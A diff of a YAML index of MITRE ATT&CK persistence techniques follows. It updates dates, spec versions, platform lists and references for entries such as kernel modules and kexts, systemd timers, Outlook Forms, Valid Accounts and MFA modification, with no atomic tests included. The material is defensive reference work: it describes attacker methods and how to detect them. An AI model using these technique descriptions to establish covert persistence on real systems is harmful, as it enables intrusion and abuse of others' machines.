-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -32747,7 +33170,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -32773,12 +33196,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -32856,9 +33277,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -32885,7 +33305,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32907,41 +33327,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -32950,22 +33339,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33031,7 +33447,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33105,11 +33520,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33126,7 +33540,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33136,7 +33549,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33145,19 +33558,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33205,11 +33616,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33238,24 +33650,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33290,9 +33704,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33352,7 +33763,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33377,13 +33788,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33436,8 +33845,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33485,78 +33894,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33604,6 +33946,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -33614,9 +33960,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -33625,8 +33975,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
